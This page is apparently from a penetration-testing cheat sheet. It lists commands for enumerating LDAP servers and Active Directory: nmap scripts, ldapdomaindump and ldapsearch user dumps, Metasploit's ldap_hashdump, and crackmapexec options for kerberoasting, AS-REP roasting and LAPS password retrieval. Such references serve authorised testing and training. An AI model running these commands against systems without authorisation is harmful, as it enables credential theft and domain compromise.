LDAP Ports (389,636)

Nmap

No credentials, see what can be pulled.

nmap -n -sV --script "ldap* and not brute" <IP>

ldapdomaindump

# With Credentials
ldapdomaindump -u security.local\\<User> -p '<Password>' ldap://<IP>

# Without credentials
ldapdomaindump ldap://<IP>

ldapsearch

# Get all users
ldapsearch -x -H ldap://<IP> -D '<Domain>\<User>' -w '<Password>' -b 'DC=security,DC=local'

# Get all users and cleanup output
ldapsearch -x -H ldap://<IP> -D '<Domain>\<User>' -w '<Password>' -b 'DC=security,DC=local' | grep userPrincipalName | sed 's/userPrincipalName: //'

# Without credentials
ldapsearch -x -H ldap://<IP> -b 'DC=security,DC=local'
ldapsearch -x -H ldap://<IP> -b 'DC=security,DC=local' | grep userPrincipalName | sed 's/userPrincipalName: //'

Metasploit

use auxiliary/gather/ldap_hashdump

Crackmapexec

crackmapexec ldap <IP> -u <User> -p <Password> --kdcHost <Host> --admin-count
crackmapexec ldap <IP> -u <User> -p <Password> --kdcHost <Host>  --asreproast ASREPROAST
crackmapexec ldap <IP> -u <User> -p <Password> --kdcHost <Host>  --groups
crackmapexec ldap'<IP> -u <User> -p <Password> --kdcHost <Host>  --kerberoasting KERBEROASTING
crackmapexec ldap <IP> -u <User> -p <Password> --kdcHost <Host>  --password-not-required
crackmapexec ldap <IP> -u <User> -p <Password> --kdcHost <Host>  --trusted-for-delegation
crackmapexec ldap <IP> -u <User> -p <Password> --kdcHost <Host>  --users

# Modules
crackmapexec ldap <IP> -u <User> -p <Password> --kdcHost <Host> -M get-desc-users
crackmapexec ldap <IP> -u <User> -p <Password> --kdcHost <Host> -M laps
crackmapexec ldap <IP> -u <User> -p <Password> --kdcHost <Host> -M ldap-signing

PreviousJava RMI Port (1099)NextApache Tomcat Ports (8080,8180)

Last updated 6 months ago